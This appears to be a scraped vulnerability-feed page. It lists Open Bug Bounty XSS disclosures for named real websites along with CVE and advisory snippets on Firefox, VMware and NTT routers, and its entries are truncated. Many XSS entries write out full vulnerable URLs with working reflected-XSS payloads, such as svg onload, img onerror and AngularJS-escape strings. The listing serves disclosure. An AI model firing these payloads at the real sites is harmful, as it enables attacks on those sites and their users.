gore-workwear.de XSS vulnerability
Vulnerable URL: http://www.gore-workwear.de/searchtof/index?N=0&Ntx;=mode%2Bmatchallpartial&Ntk;=All&Nty;=1&locale;=tof_de_DE&Ntt;=%22%3Eblub%3Csvg%2Fonload%3Dalert(%2FOPENBUGBOUNTY%2F)%3E%22%3Eblub%3Csvg%2Fonload%3Dalert(%2FOPENBUGBOUNTY%2F)%3E Details: Description| Value ---|--- Patched:| Yes,...
6.3AI Score
Mozilla Fixes 32 Vulnerabilities in Firefox 54
Mozilla fixed 32 vulnerabilities, including a critical bug that could have resulted in a crash, with the release Tuesday of Firefox 54, the latest version of its flagship browser. The critical bug, a use-after-free vulnerability, was dug up by longtime bug hunter Nils. The vulnerability...
0.8AI Score
0.007EPSS
VMware Patches Critical Vulnerabilities in vSphere Data Protection
VMware fixed two critical vulnerabilities in its vSphere Data Protection solution this week that could have allowed an attacker to execute commands on the virtual appliance, among other outcomes. The Department of Homeland Security’s CERT encouraged users and admins on Wednesday to apply the...
1.4AI Score
0.005EPSS
6.3AI Score
vSphere Data Protection (VDP) updates address multiple security issues.
a. VDP Java deserialization issue VDP contains a deserialization issue. Exploitation of this issue may allow a remote attacker to execute commands on the appliance. VMware would like to thank Tim Roberts, Arthur Chilipweli, and Kelly Correll from NTT Security for reporting this issue to us. The...
9.8CVSS
3.4AI Score
0.054EPSS
6.9AI Score
Cross-site request forgery (CSRF) vulnerability in L-04D firmware version V10a and V10b allows remote attackers to hijack the authentication of administrators to perform arbitrary operations via unspecified...
8.8CVSS
8.9AI Score
0.002EPSS
investmentreview.com XSS vulnerability
Open Bug Bounty ID: OBB-238668 Description| Value ---|--- Affected Website:| investmentreview.com Open Bug Bounty Program:| Create your bounty program now. It's open and free. Vulnerable Application:| Custom Code Vulnerability Type:| XSS (Cross Site Scripting) / CWE-79 CVSSv3 Score:| 6.1...
6.3AI Score
search.library.duke.edu XSS vulnerability
Vulnerable URL: http://search.library.duke.edu/search?N=0&Nty;=1&Ntk;=Subject&Ntt;=1%22%2F%3E%3CsvG%2FonLoad%3Dalert%28/OPENBUGBOUNTY/%29%3E&sugg;= Details: Description| Value ---|--- Patched:| No Latest check for patch:| 10.08.2017 Vulnerability type:| XSS Vulnerability status:| Publicly...
6.3AI Score
salliemae.com XSS vulnerability
Open Bug Bounty ID: OBB-237064 Description| Value ---|--- Affected Website:| salliemae.com Open Bug Bounty Program:| Create your bounty program now. It's open and free. Vulnerable Application:| Custom Code Vulnerability Type:| XSS (Cross Site Scripting) / CWE-79 CVSSv3 Score:| 6.1...
6.3AI Score
mountaingear.us XSS vulnerability
Vulnerable URL: http://www.mountaingear.us/webstore/home.htm?Ntt=89%22%27%2D%2D%21%3E%3CImage%0CSrcset%3DK%0COnerror%3Dconfirm%60OPENBUGBOUNTY%60%0C# Details: Description| Value ---|--- Patched:| No Latest check for patch:| 31.07.2017 Vulnerability type:| XSS Vulnerability status:| Publicly...
6.3AI Score
Vulnerable URL: http://www.sgs.com.tr/tr-TR/SearchResults.aspx?N=4294967075&Ntk;=SI_TR-TR_Turkey&Ntt;=%22%27%2D%2D%21> ##### Details: Description| Value ---|--- Patched:| No Latest check for patch:| 31.07.2017 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa...
6.3AI Score
Vulnerable URL: http://www.sgs.co.uk/en-GB/SearchResults.aspx?N=4294967073&Ntk;=SI_EN-GB_UK&Ntt;=%22%27%2D%2D%21> ##### Details: Description| Value ---|--- Patched:| No Latest check for patch:| 31.07.2017 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank|...
6.3AI Score
Vulnerable URL: http://www.sgs.vn/en/SearchResults.aspx?N=4294967071&Ntk;=SI_EN-US_Vietnam&Ntt;=%22%27%2D%2D%21> ##### Details: Description| Value ---|--- Patched:| Yes, at Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 2661572 VIP website status:|...
6.3AI Score
sgsgroup.com.ua XSS vulnerability
Vulnerable URL: http://www.sgsgroup.com.ua/ru-RU/SearchResults.aspx?N=4294967074&Ntk;=SI_RU-RU_Ukraine&Ntt;=%22%27%2D%2D%21> ##### Details: Description| Value ---|--- Patched:| No Latest check for patch:| 31.07.2017 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed ...
6.3AI Score
sgsgroup.us.com XSS vulnerability
Vulnerable URL: http://www.sgsgroup.us.com/en/SearchResults.aspx?N=4294967072&Ntk;=SI_EN-US_USA&Ntt;=%22%27%2D%2D%21> ##### Details: Description| Value ---|--- Patched:| Yes, at Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 1174067 VIP website...
6.3AI Score
jcpenney.com.edgekey.net XSS vulnerability
Vulnerable URL: http://www.jcpenney.com.edgekey.net/s/648?Ntt=648%22--!%3E%3CSvg/Onload=confirm('OPENBUGBOUNTY')%3E%22# Details: Description| Value ---|--- Patched:| No Latest check for patch:| 31.07.2017 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| Unknown / Not.....
6.3AI Score
us.riverisland.com XSS vulnerability
Vulnerable URL: http://us.riverisland.com/search?Ntt="'--!>{{a="".constructor.prototype;a.charAt=a.trim;$eval("a,confirmOPENBUGBOUNTY,b")}} Details: Description| Value ---|--- Patched:| No Latest check for patch:| 31.07.2017 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed...
6.3AI Score
5.9CVSS
5.7AI Score
0.002EPSS
7.5CVSS
7.3AI Score
0.001EPSS
6.9AI Score
SA142 : Invalid TCP Packet Generation DoS in SSL Visibility
SUMMARY The SSL Visibility appliance may, under certain circumstances, generate invalid TCP reset (RST) packets to remote SSL servers when terminating an intercepted SSL connection. Some SSL servers may ignore the invalid RST packet received and keep the TCP connection open. A malicious SSL...
5.9CVSS
1.4AI Score
0.003EPSS
Vulnerable URL: http://www.brady.de/de-DE/products/productsearch?startingCategory=0&Ntt;=%3E%27%3E%22%3Etr%3Ci%3Etr%3Cscript%20src=https://openbugbounty.org/1.js%3E Details: Description| Value ---|--- Patched:| Yes, at 28.07.2017 Latest check for patch:| 28.07.2017 19:15 GMT Vulnerability type:|...
6.3AI Score
hi-online.co.za XSS vulnerability
Vulnerable URL: http://www.hi-online.co.za/noResults?Ntt=%3E%27%3E%22%3Ep%3Cimg+src%3Dy+onerror%3Dprompt%28%2Fopenbugbounty%2F%29%3E Details: Description| Value ---|--- Patched:| No Latest check for patch:| 31.07.2017 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank|...
6.3AI Score
duesouthescapes.co.za XSS vulnerability
Open Bug Bounty ID: OBB-218986 Description| Value ---|--- Affected Website:| duesouthescapes.co.za Open Bug Bounty Program:| Create your bounty program now. It's open and free. Vulnerable Application:| Custom Code Vulnerability Type:| XSS (Cross Site Scripting) / CWE-79 CVSSv3 Score:| 6.1...
6.3AI Score
witt-international.co.uk XSS vulnerability
Vulnerable URL: http://www.witt-international.co.uk/search/_/N-1c?searchType=FullText&Nty;=1&Ntt;=%27%22%3E%3Csvg%2Fonload%3Dalert%281%29%3E Details: Description| Value ---|--- Patched:| No Latest check for patch:| 30.07.2017 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed...
6.3AI Score
michaelkors.co.uk XSS vulnerability
Vulnerable URL: http://www.michaelkors.co.uk/search/_/N-6f9dqlZzcktlt/Ntt-jeans%22%7D%7D%7D%7D%3C//scriptalert/%22%3E%3Cy%20onafterscriptexecute=%22confirm%60OPENBUGBOUNTY%60%22%3E%3C/script%3Exss%3Cy//a/|//=%20%20confirm.; Details: Description| Value ---|--- Patched:| Yes, at Vulnerability...
6.3AI Score
vivara.com.br XSS vulnerability
Vulnerable URL: http://www.vivara.com.br/busca?Ntt='-alert('OPENBUGBOUNTY')-' Details: Description| Value ---|--- Patched:| No Latest check for patch:| 28.07.2017 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 55106 VIP website status:| No Check vivara.com.br SSL...
6.3AI Score
clasohlson.com XSS vulnerability
Vulnerable URL: http://www.clasohlson.com/se/view/content/search?userSelection=B2B&rememberCookie;=true&N;=0&Ntk;=All&Ntt;=" autofocus onfocus%3dalert%26lpar;"OPENBUGBOUNTY"%26rpar; style%3d"position:fixed;left:0;top:0;display:block;width:100%25;height:100%25;"...
6.2AI Score
guiacores.com XSS vulnerability
Open Bug Bounty ID: OBB-201103 Description| Value ---|--- Affected Website:| guiacores.com Open Bug Bounty Program:| Create your bounty program now. It's open and free. Vulnerable Application:| Custom Code Vulnerability Type:| XSS (Cross Site Scripting) / CWE-79 CVSSv3 Score:| 6.1...
6.3AI Score
us.topman.com XSS vulnerability
Vulnerable URL: http://us.topman.com/webapp/wcs/stores/servlet/CatalogNavigationSearchResultCmd?langId=-1&storeId;=13051&catalogId;=33059&Dy;=1&Nty;=1&beginIndex;=1&pageNum;=1&Ntt;=!%22%3E%3Cvideo%2Fonloadstart%3Dconfirm%28%2FOPENBUGBOUNTY%2F%29+%3C%2Fsrc%3E&x;=0&y;=0&geoip;=noredirect Details:...
6.3AI Score
dorothyperkins.com XSS vulnerability
Vulnerable URL: http://www.dorothyperkins.com/webapp/wcs/stores/servlet/CatalogNavigationSearchResultCmd?langId=-1&storeId;=12552&catalogId;=33053&Dy;=1&Nty;=1&beginIndex;=1&pageNum;=1&Ntt;=%21%22%3E%3Cvideo%2Fonloadstart%3Dconfirm%28%22OPENBUGBOUNTY%22%29+%3C%2Fsrc%3E&x;=0&y;=0 Details:...
6.3AI Score
eu.topman.com XSS vulnerability
Vulnerable URL: http://eu.topman.com/webapp/wcs/stores/servlet/CatalogNavigationSearchResultCmd?langId=-1&storeId;=13061&catalogId;=34064&Dy;=1&Nty;=1&beginIndex;=1&pageNum;=1&Ntt;=!%22%3E%3Cvideo%2Fonloadstart%3Dconfirm%28%22OPENBUGBOUNTY%22%29+%3C%2Fsrc%3E&x;=0&y;=0 Details: Description| Value...
6.3AI Score
Code Reuse a Peril for Secure Software Development
The amount of insecure software tied to reused third-party libraries and lingering in applications long after patches have been deployed is staggering. It’s a habitual problem perpetuated by developers failing to vet third-party code for vulnerabilities, and some repositories taking a hands-off...
-0.4AI Score
0.975EPSS
johnlewis.com XSS vulnerability
Open Bug Bounty ID: OBB-197956 Description| Value ---|--- Affected Website:| johnlewis.com Vulnerable Application:| Custom Code Vulnerability Type:| XSS (Cross Site Scripting) / CWE-79 CVSSv3 Score:| 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N] Remediation Guide:| OWASP XSS Prevention Cheat.....
6.4AI Score
zattini.com.br XSS vulnerability
Vulnerable URL: http://www.zattini.com.br/cabelos?Ntt=">// Details: Description| Value ---|--- Patched:| Yes, at Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 12021 VIP website status:| Yes Check zattini.com.br SSL connection:| (Grade: A) Coordinated Disclosure.....
6.3AI Score
torontopubliclibrary.ca XSS vulnerability
Vulnerable URL: http://www.torontopubliclibrary.ca/search.jsp?Ntt=%22%3E%3Csvg%2Fonload%3Dalert%28%2FOPENBUGBOUNTY%2F%29%3E Details: Description| Value ---|--- Patched:| No Latest check for patch:| 28.07.2017 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 22402 VIP.....
6.3AI Score
gore-tex.com XSS vulnerability
Vulnerable URL: http://www.gore-tex.com/searchgoretex/index?Ntt=te%22%3E%3Cimg%20src=x%20onerror=prompt(/OPENBUGBOUNTY/)%3Est&N;=0&Ntx;=mode%2Bmatchallpartial&Ntk;=All&Nty;=1&locale;=en_us Details: Description| Value ---|--- Patched:| Yes, at 28.07.2017 Latest check for patch:| 28.07.2017 12:55...
6.3AI Score
torontopubliclibrary.ca XSS vulnerability
Vulnerable URL: http://www.torontopubliclibrary.ca/search.jsp?Ntt=%27;alert(0)//%27;alert(1)//%22;alert(2)//%22;alert+(3)//--%3E%3C/SCRIPT%3E%22%3E%27+%3E%3CSCRIPT%3Ealert(/XSSPOSED/)%3C/SCRIPT%3E=&{}%22);}alert(6+);function+xss(){// Details: Description| Value ---|--- Patched:| No Latest check...
6.3AI Score
Vulnerable URL: http://www.wehkamp.nl/Zoeken/ArtikelDetail.aspx?ArtikelNummer=743260&Ntt;=panamaΠ=0&PrI;=8&Nrpp;=96&Blocks;=0&View;=Grid"onmouseover="alert('OPENBUGBOUNTY')" Details: Description| Value ---|--- Patched:| No Latest check for patch:| 30.07.2017 Vulnerability type:| XSS...
6.3AI Score
Vulnerable URL: http://www.gore-tex.fr/searchgoretex/index?Ntt=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28%2FOPENBUGBOUNTY%2F%29%3E&N;=0&Ntx;=mode%2Bmatchallpartial&Ntk;=All&Nty;=1&locale;=fr_fr Details: Description| Value ---|--- Patched:| Yes, at 28.07.2017 Latest check for patch:| 28.07.2017...
6.3AI Score
JVN#46351856: Docomo L-04D mobile WiFi router vulnerable to cross-site request forgery
L-04D provided by NTT DOCOMO, INC. is a wireless WiFi router. L-04D contains a cross-site request forgery vulnerability in the the web management screen. ## Impact If a user views a malicious page while logged-in, unintended operations may be conducted. ## Solution Update the firmware Update the...
8.8CVSS
2.5AI Score
0.002EPSS
salliemae.com XSS vulnerability
Vulnerable URL: https://www.salliemae.com/search/?Ntt=%3Cimg%20src=x%20onerror=prompt%28/OPENBUGBOUNTY/%29%3E&Ntk;=all_fields&N;=0 Details: Description| Value ---|--- Patched:| Yes, at Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 13916 VIP website status:| Yes...
6.3AI Score
6.2AI Score
verabradley.com XSS vulnerability
Vulnerable URL: http://www.verabradley.com/browse/_/?Ntt=test%22%3C/script%3E%3Csvg%20onload=onload=prompt(%22OPENBUGBOUNTY%22)%3E Details: Description| Value ---|--- Patched:| Yes, at 27.07.2017 Latest check for patch:| 27.07.2017 22:40 GMT Vulnerability type:| XSS Vulnerability status:|...
6.3AI Score
Cross-site request forgery (CSRF) vulnerability on NTT EAST Hikari Denwa routers with firmware PR-400MI, RT-400MI, and RV-440MI 07.00.1006 and earlier and NTT WEST Hikari Denwa routers with firmware PR-400MI, RT-400MI, and RV-440MI 07.00.1005 and earlier allows remote attackers to hijack the...
8.8CVSS
8.9AI Score
0.001EPSS
Cross-site request forgery (CSRF) vulnerability on NTT EAST Hikari Denwa routers with firmware PR-400MI, RT-400MI, and RV-440MI 07.00.1006 and earlier and NTT WEST Hikari Denwa routers with firmware PR-400MI, RT-400MI, and RV-440MI 07.00.1005 and earlier allows remote attackers to hijack the...
8.8CVSS
9AI Score
0.001EPSS
NTT EAST Hikari Denwa routers with firmware PR-400MI, RT-400MI, and RV-440MI 07.00.1006 and earlier and NTT WEST Hikari Denwa routers with firmware PR-400MI, RT-400MI, and RV-440MI 07.00.1005 and earlier allow remote authenticated users to execute arbitrary OS commands via unspecified...
7.2CVSS
7.1AI Score
0.004EPSS
NTT EAST Hikari Denwa routers with firmware PR-400MI, RT-400MI, and RV-440MI 07.00.1006 and earlier and NTT WEST Hikari Denwa routers with firmware PR-400MI, RT-400MI, and RV-440MI 07.00.1005 and earlier allow remote authenticated users to execute arbitrary OS commands via unspecified...
7.2CVSS
7AI Score
0.004EPSS
Cross site request forgery (csrf)
Cross-site request forgery (CSRF) vulnerability on NTT EAST Hikari Denwa routers with firmware PR-400MI, RT-400MI, and RV-440MI 07.00.1006 and earlier and NTT WEST Hikari Denwa routers with firmware PR-400MI, RT-400MI, and RV-440MI 07.00.1005 and earlier allows remote attackers to hijack the...
8.8CVSS
7.8AI Score
0.001EPSS